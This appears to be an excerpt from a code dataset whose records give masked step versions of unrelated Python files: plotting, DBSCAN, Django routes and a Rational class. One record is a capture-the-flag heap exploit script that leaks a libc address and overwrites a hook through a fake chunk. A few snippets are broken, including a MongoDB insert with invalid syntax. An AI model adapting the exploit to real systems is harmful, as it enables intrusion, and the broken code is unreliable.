"step-4": "import graphics\nimport ply.lex as lex\nimport ply.yacc as yacc\nimport jstokens\nimport jsgrammar\n\ndef interpret(trees): # Hello, friend\n for tree in trees: # Hello,\n # (\"word-element\",\"Hello\")\n nodetype=tree[0] # \"word-element\"\n if nodetype == \"word-element\":\n graphics.word(tree[1]) \n elif nodetype == \"tag-element\":\n # <b>Strong text</b>\n tagname = tree[1] # b\n tagargs = tree[2] # []\n subtrees = tree[3] # ...Strong Text!...\n closetagname = tree[4] # b\n if(tagname!=closetagname):\n graphics.warning(\"mismatched tag\")\n else:\n graphics.begintag(tagname,tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == \"javascript-element\":\n jstext = tree[1]; # \"document.write(55);\"\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext,lexer=jslexer)\n # jstree is a parse tree for JavaScript\n result = jsinterp.interpret(jstree)\n graphics.word(result)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# add some description here
import glob
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import xarray as xr
import pandas as pd
import os
import pickle
from scipy.interpolate import griddata
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib import dates
import datetime
import matplotlib
matplotlib.style.use('ggplot')
import sys
sys.path.append('masterThesisPack/')
import masterThesisPack as oceano
BASE_DIR = oceano.make_dir()
DATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')
SAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'
# importing laje de santos data
raw = xr.open_dataset(DATA_DIR+'Est_lajeSantos/lajesantos.nc')
raw = raw.to_dataframe()
# cut only a period
# raw = raw['2015-04':]
data = raw.copy()
treat = data.copy()
treat[treat > 3*treat.std()] = np.nan
std = treat.wind_along.std()
fig,ax = plt.subplots()
raw.wind_along.plot(ax=ax)
ax.axhline(y=3*std,c='k',ls='dashed')
ax.axhline(y=-3*std,c='k',ls='dashed')
ax.set_ylabel(r'Vento a 10m de altura [m.s$^{-1}$]')
# plt.savefig(SAVE_DIR.replace('github','gitlab') + 'qualityControl.png',dpi=250)
|
normal
|
{
"blob_id": "4c1fea4dcf143ec976d3956039616963760d5af6",
"index": 5030,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmatplotlib.style.use('ggplot')\n<mask token>\nsys.path.append('masterThesisPack/')\n<mask token>\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
"step-3": "<mask token>\nmatplotlib.style.use('ggplot')\n<mask token>\nsys.path.append('masterThesisPack/')\n<mask token>\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\nraw = xr.open_dataset(DATA_DIR + 'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3 * treat.std()] = np.nan\nstd = treat.wind_along.std()\nfig, ax = plt.subplots()\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
"step-4": "import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pandas as pd\nimport os\nimport pickle\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import dates\nimport datetime\nimport matplotlib\nmatplotlib.style.use('ggplot')\nimport sys\nsys.path.append('masterThesisPack/')\nimport masterThesisPack as oceano\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\nraw = xr.open_dataset(DATA_DIR + 'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3 * treat.std()] = np.nan\nstd = treat.wind_along.std()\nfig, ax = plt.subplots()\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
"step-5": "# add some description here\n\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pandas as pd\nimport os\nimport pickle\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import dates\nimport datetime\n\nimport matplotlib\nmatplotlib.style.use('ggplot')\n\nimport sys\nsys.path.append('masterThesisPack/')\n\nimport masterThesisPack as oceano\n\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\n\n# importing laje de santos data\nraw = xr.open_dataset(DATA_DIR+'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\n\n# cut only a period\n# raw = raw['2015-04':]\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3*treat.std()] = np.nan\n\nstd = treat.wind_along.std()\n\nfig,ax = plt.subplots()\n\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3*std,c='k',ls='dashed')\nax.axhline(y=-3*std,c='k',ls='dashed')\nax.set_ylabel(r'Vento a 10m de altura [m.s$^{-1}$]')\n\n\n# plt.savefig(SAVE_DIR.replace('github','gitlab') + 'qualityControl.png',dpi=250)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
|
normal
|
{
"blob_id": "5eb4c71869b077dac0d61072c99d801030395fc2",
"index": 636,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwnlib.gdb.attach(p)\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n<mask token>\nlog.info(hex(__srandom))\n<mask token>\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-3": "<mask token>\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-4": "from pwn import *\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-5": "from pwn import *\n\np = process(\"./weeb_hunting\")\n\nelf = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\npwnlib.gdb.attach(p)\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"\\n\")\np.send(\"\\n\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"1\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('\\x41\\x22\\x60')\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\n\nr = p.recv()\nwhile \"You found a sword\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\n__srandom = u64((r.split(\"1. \")[1].split(\"\\n\")[0] + \"\\x00\"*8)[:8])\nlog.info(hex(__srandom))\n\nhook = __srandom + 0x38A21D\n\nlog.info(\"Fake chunk: \" + hex(hook))\n\np.sendline(\"2\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\nr = p.recv()\n\nwhile \"10. 
empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(p64(hook)[:6])\n\np.interactive()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# using python3
class Rational:
def __init__(self, numer, denom):
self.numer = numer
self.denom = denom
def __add__(self, other):
return Rational(
self.numer * other.denom + other.numer * self.denom,
self.denom * other.denom
)
def __sub__(self, other):
return Rational(
self.numer * other.denom - other.numer * self.denom,
self.denom * other.denom
)
def __mul__(self, other):
return Rational(
self.numer * other.numer,
self.denom * other.denom
)
def __truediv__(self, other):
return Rational(
self.numer * other.denom,
self.denom * other.numer
)
def __str__(self):
return "{numer}/{denom}".format(
numer=self.numer, denom=self.denom
)
def __repr__(self):
return "Rational({numer}/{denom})".format(
numer=self.numer, denom=self.denom
)
|
normal
|
{
"blob_id": "8098b9c27689dd4168ef05c03d4ec00f67f8090e",
"index": 4771,
"step-1": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n <mask token>\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n <mask token>\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-3": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n\n def __str__(self):\n return '{numer}/{denom}'.format(numer=self.numer, denom=self.denom)\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-4": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n\n def __add__(self, other):\n return Rational(self.numer * other.denom + other.numer * self.denom,\n self.denom * other.denom)\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n\n def __str__(self):\n return '{numer}/{denom}'.format(numer=self.numer, denom=self.denom)\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-5": "# using python3\n\n\nclass Rational:\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n\n def __add__(self, other):\n return Rational(\n self.numer * other.denom + other.numer * self.denom,\n self.denom * other.denom\n )\n\n def __sub__(self, other):\n return Rational(\n self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom\n )\n\n def __mul__(self, other):\n return Rational(\n self.numer * other.numer,\n self.denom * other.denom\n )\n\n def __truediv__(self, other):\n return Rational(\n self.numer * other.denom,\n self.denom * other.numer\n )\n\n def __str__(self):\n return \"{numer}/{denom}\".format(\n numer=self.numer, denom=self.denom\n )\n\n def __repr__(self):\n return \"Rational({numer}/{denom})\".format(\n numer=self.numer, denom=self.denom\n )\n\n",
"step-ids": [
3,
6,
7,
8,
9
]
}
|
[
3,
6,
7,
8,
9
] |
from django.contrib import admin
from django.urls import path
from . import view
urlpatterns = [
path('', view.enterMarks),
path('MarkSheet', view.getMarks, name='MarkSheet'),
]
|
normal
|
{
"blob_id": "511c555c88fb646b7b87678044b43a5a623a5ac7",
"index": 4670,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', view.enterMarks), path('MarkSheet', view.getMarks,\n name='MarkSheet')]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path\nfrom . import view\nurlpatterns = [path('', view.enterMarks), path('MarkSheet', view.getMarks,\n name='MarkSheet')]\n",
"step-4": "\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import view\n\nurlpatterns = [\n path('', view.enterMarks),\n path('MarkSheet', view.getMarks, name='MarkSheet'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
learningRateBase = 0.001
learningRateDecreaseStep = 80
epochNum = 100
generateNum = 3
batchSize = 16
trainPoems = "./data/poems.txt"
checkpointsPath = "./model/"
|
normal
|
{
"blob_id": "2fb299f5454c251dc1c77c2597ee23bf414c716e",
"index": 4845,
"step-1": "<mask token>\n",
"step-2": "learningRateBase = 0.001\nlearningRateDecreaseStep = 80\nepochNum = 100\ngenerateNum = 3\nbatchSize = 16\ntrainPoems = './data/poems.txt'\ncheckpointsPath = './model/'\n",
"step-3": "learningRateBase = 0.001\nlearningRateDecreaseStep = 80\nepochNum = 100\ngenerateNum = 3\nbatchSize = 16\n\ntrainPoems = \"./data/poems.txt\"\ncheckpointsPath = \"./model/\"",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import mysql.connector
import hashlib
import time
from datetime import datetime
from datetime import timedelta
from pymongo import MongoClient
from pymongo import IndexModel, ASCENDING, DESCENDING
class MongoManager:
def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):
"""
client: mongo database client
expires: timedelta of amount of time before a cache entry is considered expired
"""
# if a client object is not passed
# then try connecting to mongodb at the default localhost port
self.client = MongoClient(server_ip, 27017) if client is None else client
#create collection to store cached webpages,
# which is the equivalent of a table in a relational database
self.db = self.client.spider
# create index if db is empty
if self.db.locations.count() is 0:
self.db.mfw.create_index([("url", ASCENDING)])
def query_by_url(self, url):
records = self.db.mfw.find({'url':url})
if records:
return records
else:
return None
def insert_page(self, url, html):
self.db.mfw.insert(
'url': url,
'html':html
)
def clear(self):
self.db.mfw.drop()
if __name__ == '__main__':
mongo_mgr = MongoManager()
|
normal
|
{
"blob_id": "4cb5dcf0d943ef15421bb6bced65804533d232e3",
"index": 4950,
"step-1": "import mysql.connector\nimport hashlib\nimport time \nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pymongo import MongoClient\nfrom pymongo import IndexModel, ASCENDING, DESCENDING\n\n\nclass MongoManager:\n\n def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):\n \"\"\"\n client: mongo database client\n expires: timedelta of amount of time before a cache entry is considered expired\n \"\"\"\n # if a client object is not passed \n # then try connecting to mongodb at the default localhost port \n self.client = MongoClient(server_ip, 27017) if client is None else client\n #create collection to store cached webpages,\n # which is the equivalent of a table in a relational database\n self.db = self.client.spider\n\n # create index if db is empty\n if self.db.locations.count() is 0:\n self.db.mfw.create_index([(\"url\", ASCENDING)])\n\n def query_by_url(self, url):\n records = self.db.mfw.find({'url':url})\n\n if records:\n return records\n else:\n return None\n\n def insert_page(self, url, html):\n self.db.mfw.insert(\n 'url': url,\n 'html':html\n )\n\n def clear(self):\n self.db.mfw.drop()\n\nif __name__ == '__main__':\n mongo_mgr = MongoManager()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/bin/usr/python
'''
Author: SaiKumar Immadi
Basic DBSCAN clustering algorithm written in python
5th Semester @ IIIT Guwahati
'''
# You can use this code for free. Just don't plagiarise it for your lab assignments
import sys
from math import sqrt
from random import randint
import matplotlib.pyplot as plt
def main(argv):
global e,mainList,minPts,clusters,outliers
mainList=[]
clusters=[]
outliers=[]
if(len(argv)!=3):
print "The Format is <dbscan.py minPts e data.txt>"
return 0
minPts=int(argv[0])
e=float(argv[1])
if(minPts<2 or e<=0):
print "minPts should be greater than or equal to 2"
print "e should be greater than 0"
return 0
filename=argv[2]
file=open(filename,"r")
for line in file:
lineStripped=line.strip().split('\t')
mainList.append((float(lineStripped[0]),float(lineStripped[1])))
file.close()
while(len(mainList)>0):
point=mainList.pop(0)
mainEneigh=calcEneigh(point,1,[])
outEneigh=calcEneigh(point,2,[])
if(len(mainEneigh+outEneigh)>=minPts):
cluster=calcCluster(point)
clusters.append(cluster)
else:
outliers.append(point)
fig=plt.figure()
cluster_count=0
for cluster in clusters:
cluster_count+=1
x_coordinates=[]
y_coordinates=[]
for point in cluster:
x_coordinates.append(point[0])
y_coordinates.append(point[1])
label_name="Cluster : %.d" % (cluster_count)
plt.scatter(x_coordinates,y_coordinates,s=5,label=label_name)
x_out_coordinates=[]
y_out_coordinates=[]
for outlier in outliers:
x_out_coordinates.append(outlier[0])
y_out_coordinates.append(outlier[1])
plt.scatter(x_out_coordinates,y_out_coordinates,s=5,label='outliers')
plt.title('DBSCAN Clustering')
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.legend()
fig.savefig('output.jpg')
print len(clusters),"clusters"
plt.show()
return 0
def calcEneigh(p,opt,optList):
global e,mainList,minPts,clusters,outliers
if(opt==1):
list=mainList
elif(opt==2):
list=outliers
elif(opt==3):
list=optList
eneigh=[]
for point in list:
x1=p[0]
y1=p[1]
x2=point[0]
y2=point[1]
dist = sqrt((x2 - x1)**2 + (y2 - y1)**2)
if(dist<=e):
eneigh.append(point)
return eneigh
def calcCluster(p):
global e,mainList,minPts,clusters,outliers
cluster=[]
tempList=[]
tempList.append(p)
while(len(tempList)>0):
point=tempList.pop(0)
mainEneigh=calcEneigh(point,1,[])
outEneigh=calcEneigh(point,2,[])
clusterEneigh=calcEneigh(point,3,cluster+tempList)
cluster.append(point)
for x in mainEneigh:
mainList.remove(x)
for x in outEneigh:
outliers.remove(x)
if(len(mainEneigh+outEneigh+clusterEneigh)>=minPts):
tempList=tempList+mainEneigh+outEneigh
else:
cluster=cluster+mainEneigh+outEneigh
return cluster
if __name__ == "__main__":
main(sys.argv[1:])
|
normal
|
{
"blob_id": "624ecf743d5be1acc33df14bd721b3103d232f0e",
"index": 2444,
"step-1": "#!/bin/usr/python\n'''\nAuthor: SaiKumar Immadi\nBasic DBSCAN clustering algorithm written in python\n5th Semester @ IIIT Guwahati\n'''\n\n# You can use this code for free. Just don't plagiarise it for your lab assignments\n\nimport sys\nfrom math import sqrt\nfrom random import randint\nimport matplotlib.pyplot as plt\n\ndef main(argv):\n global e,mainList,minPts,clusters,outliers\n mainList=[]\n clusters=[]\n outliers=[]\n if(len(argv)!=3):\n print \"The Format is <dbscan.py minPts e data.txt>\"\n return 0\n minPts=int(argv[0])\n e=float(argv[1])\n if(minPts<2 or e<=0):\n print \"minPts should be greater than or equal to 2\"\n print \"e should be greater than 0\"\n return 0\n filename=argv[2]\n file=open(filename,\"r\")\n for line in file:\n lineStripped=line.strip().split('\\t')\n mainList.append((float(lineStripped[0]),float(lineStripped[1])))\n file.close()\n while(len(mainList)>0):\n point=mainList.pop(0)\n mainEneigh=calcEneigh(point,1,[])\n outEneigh=calcEneigh(point,2,[])\n if(len(mainEneigh+outEneigh)>=minPts):\n cluster=calcCluster(point)\n clusters.append(cluster)\n else:\n outliers.append(point)\n fig=plt.figure()\n cluster_count=0\n for cluster in clusters:\n cluster_count+=1\n x_coordinates=[]\n y_coordinates=[]\n for point in cluster:\n x_coordinates.append(point[0])\n y_coordinates.append(point[1])\n label_name=\"Cluster : %.d\" % (cluster_count)\n plt.scatter(x_coordinates,y_coordinates,s=5,label=label_name)\n x_out_coordinates=[]\n y_out_coordinates=[]\n for outlier in outliers:\n x_out_coordinates.append(outlier[0])\n y_out_coordinates.append(outlier[1])\n plt.scatter(x_out_coordinates,y_out_coordinates,s=5,label='outliers')\n plt.title('DBSCAN Clustering')\n plt.xlabel('x-axis')\n plt.ylabel('y-axis')\n plt.legend()\n fig.savefig('output.jpg')\n print len(clusters),\"clusters\"\n plt.show()\n return 0\n\ndef calcEneigh(p,opt,optList):\n global e,mainList,minPts,clusters,outliers\n if(opt==1):\n list=mainList\n elif(opt==2):\n 
list=outliers\n elif(opt==3):\n \tlist=optList\n eneigh=[]\n for point in list:\n x1=p[0]\n y1=p[1]\n x2=point[0]\n y2=point[1]\n dist = sqrt((x2 - x1)**2 + (y2 - y1)**2)\n if(dist<=e):\n eneigh.append(point)\n return eneigh\n\ndef calcCluster(p):\n global e,mainList,minPts,clusters,outliers\n cluster=[]\n tempList=[]\n tempList.append(p)\n while(len(tempList)>0):\n point=tempList.pop(0)\n mainEneigh=calcEneigh(point,1,[])\n outEneigh=calcEneigh(point,2,[])\n clusterEneigh=calcEneigh(point,3,cluster+tempList)\n cluster.append(point)\n for x in mainEneigh:\n mainList.remove(x)\n for x in outEneigh:\n outliers.remove(x)\n if(len(mainEneigh+outEneigh+clusterEneigh)>=minPts):\n tempList=tempList+mainEneigh+outEneigh\n else:\n cluster=cluster+mainEneigh+outEneigh\n return cluster\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n",
